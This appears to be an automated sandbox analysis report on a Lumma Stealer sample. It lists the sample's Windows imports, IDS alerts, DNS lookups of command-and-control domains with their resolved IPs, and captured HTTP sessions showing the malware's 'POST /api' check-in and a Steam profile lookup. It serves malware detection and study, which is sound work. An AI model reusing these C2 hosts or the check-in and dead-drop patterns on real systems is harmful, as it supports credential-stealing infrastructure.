                                                                                                                                                                                                                                                    KERNEL32.dllGetFileSize, SearchPathW, SetLocaleInfoA, InterlockedIncrement, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, ReadConsoleOutputAttribute, GetEnvironmentStringsW, Process32First, SetComputerNameW, GetTimeFormatA, SetEvent, GetProcessPriorityBoost, GetModuleHandleW, GetCommandLineA, GetEnvironmentStrings, LoadLibraryW, ReadProcessMemory, DeleteVolumeMountPointW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, LocalAlloc, AddAtomW, FoldStringA, CreatePipe, GetModuleHandleA, UpdateResourceW, OpenFileMappingW, GetShortPathNameW, FindFirstVolumeA, GetVersionExA, UnregisterWaitEx, SetFileAttributesW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
                                                                                                                                                                                                                                                    USER32.dllGetProcessDefaultLayout
                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                    TurkmenTurkmenistan
                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                    2024-12-17T16:42:03.048324+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.6556581.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:03.273158+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.6594601.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:04.265761+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.6594601.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:06.087826+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.649718178.62.201.34443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:06.087826+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718178.62.201.34443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:06.091017+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1178.62.201.34443192.168.2.649718TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:06.590509+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649718178.62.201.34443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:06.590509+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649718178.62.201.34443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:06.595031+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.6555511.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:07.592179+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.6555511.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:10.008763+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.64972445.77.249.79443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:10.008763+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64972445.77.249.79443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:10.166034+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)145.77.249.79443192.168.2.649724TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:11.213949+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.64972445.77.249.79443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:11.213949+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.64972445.77.249.79443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:11.226709+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.6557801.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:11.452171+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.6589741.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:11.688114+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.6568121.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:11.917702+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.6534541.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:12.177407+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.6576761.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:12.402511+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.6638851.1.1.153UDP
                                                                                                                                                                                                                                                    2024-12-17T16:42:14.462510+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64974023.55.153.106443TCP
                                                                                                                                                                                                                                                    2024-12-17T16:42:15.505689+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64974023.55.153.106443TCP
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.706372976 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.706442118 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.706568003 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.709708929 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.709731102 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.087748051 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.087826014 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.090995073 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.091017008 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.091363907 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.138220072 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.138266087 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.138362885 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.590563059 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.590687990 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.590787888 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.591835976 CET49718443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.591859102 CET44349718178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.074275017 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.074310064 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.074379921 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.074700117 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.074716091 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:10.008650064 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:10.008763075 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:10.166009903 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:10.166033983 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:10.166520119 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:10.169061899 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:10.169116020 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:10.169164896 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.213985920 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.214082956 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.214135885 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.223661900 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.223673105 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.223706961 CET49724443192.168.2.645.77.249.79
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.223711967 CET4434972445.77.249.79192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.682332039 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.682394028 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.682599068 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.682856083 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.682869911 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:14.462438107 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:14.462510109 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:14.464646101 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:14.464652061 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:14.465003967 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:14.467391014 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:14.515324116 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.505789042 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.505836010 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.505856991 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.505868912 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.505904913 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.505922079 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.505922079 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.505950928 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.669924974 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.669981956 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.670114994 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.670145988 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.671034098 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.707752943 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.707828045 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.707860947 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.707880974 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.707938910 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.713438034 CET49740443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:15.713466883 CET4434974023.55.153.106192.168.2.6
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:03.048324108 CET5565853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:03.269305944 CET53556581.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:03.273158073 CET5946053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.265760899 CET5946053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.700968981 CET53594601.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.700985909 CET53594601.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.595031023 CET5555153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:07.592179060 CET5555153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.070605040 CET53555511.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.070638895 CET53555511.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.226708889 CET5578053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.444626093 CET53557801.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.452171087 CET5897453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.680289984 CET53589741.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.688113928 CET5681253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.911550045 CET53568121.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.917701960 CET5345453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.142201900 CET53534541.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.177407026 CET5767653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.398564100 CET53576761.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.402510881 CET6388553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.541246891 CET53638851.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.544254065 CET5309553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.681442976 CET53530951.1.1.1192.168.2.6
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:03.048324108 CET192.168.2.61.1.1.10x6375Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:03.273158073 CET192.168.2.61.1.1.10xec10Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.265760899 CET192.168.2.61.1.1.10xec10Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:06.595031023 CET192.168.2.61.1.1.10x60c3Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:07.592179060 CET192.168.2.61.1.1.10x60c3Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.226708889 CET192.168.2.61.1.1.10x6f0dStandard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.452171087 CET192.168.2.61.1.1.10xb74fStandard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.688113928 CET192.168.2.61.1.1.10x6018Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.917701960 CET192.168.2.61.1.1.10x961aStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.177407026 CET192.168.2.61.1.1.10x95e8Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.402510881 CET192.168.2.61.1.1.10x9cf1Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.544254065 CET192.168.2.61.1.1.10x8ef1Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 17, 2024 16:41:56.540215015 CET1.1.1.1192.168.2.60x7f4dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:41:56.540215015 CET1.1.1.1192.168.2.60x7f4dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:03.269305944 CET1.1.1.1192.168.2.60x6375Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.700968981 CET1.1.1.1192.168.2.60xec10No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.700968981 CET1.1.1.1192.168.2.60xec10No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.700968981 CET1.1.1.1192.168.2.60xec10No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.700985909 CET1.1.1.1192.168.2.60xec10No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.700985909 CET1.1.1.1192.168.2.60xec10No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:04.700985909 CET1.1.1.1192.168.2.60xec10No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.070605040 CET1.1.1.1192.168.2.60x60c3No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.070605040 CET1.1.1.1192.168.2.60x60c3No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.070605040 CET1.1.1.1192.168.2.60x60c3No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.070638895 CET1.1.1.1192.168.2.60x60c3No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.070638895 CET1.1.1.1192.168.2.60x60c3No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:08.070638895 CET1.1.1.1192.168.2.60x60c3No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.444626093 CET1.1.1.1192.168.2.60x6f0dName error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.680289984 CET1.1.1.1192.168.2.60xb74fName error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:11.911550045 CET1.1.1.1192.168.2.60x6018Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.142201900 CET1.1.1.1192.168.2.60x961aName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.398564100 CET1.1.1.1192.168.2.60x95e8Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.541246891 CET1.1.1.1192.168.2.60x9cf1Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 17, 2024 16:42:12.681442976 CET1.1.1.1192.168.2.60x8ef1No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    • immureprech.biz
                                                                                                                                                                                                                                                    • deafeninggeh.biz
                                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.649718178.62.201.344432248C:\Users\user\Desktop\66DJ2wErLz.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-17 15:42:06 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                    Host: immureprech.biz
                                                                                                                                                                                                                                                    2024-12-17 15:42:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                    2024-12-17 15:42:06 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 17 Dec 2024 15:42:06 GMT
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.64972445.77.249.794432248C:\Users\user\Desktop\66DJ2wErLz.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-17 15:42:10 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                    Host: deafeninggeh.biz
                                                                                                                                                                                                                                                    2024-12-17 15:42:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                    2024-12-17 15:42:11 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 17 Dec 2024 15:42:10 GMT
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.64974023.55.153.1064432248C:\Users\user\Desktop\66DJ2wErLz.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-17 15:42:14 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                                    2024-12-17 15:42:15 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Date: Tue, 17 Dec 2024 15:42:15 GMT
                                                                                                                                                                                                                                                    Content-Length: 35131
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: sessionid=3ea3f124c1b5621fba051c57; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                    2024-12-17 15:42:15 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
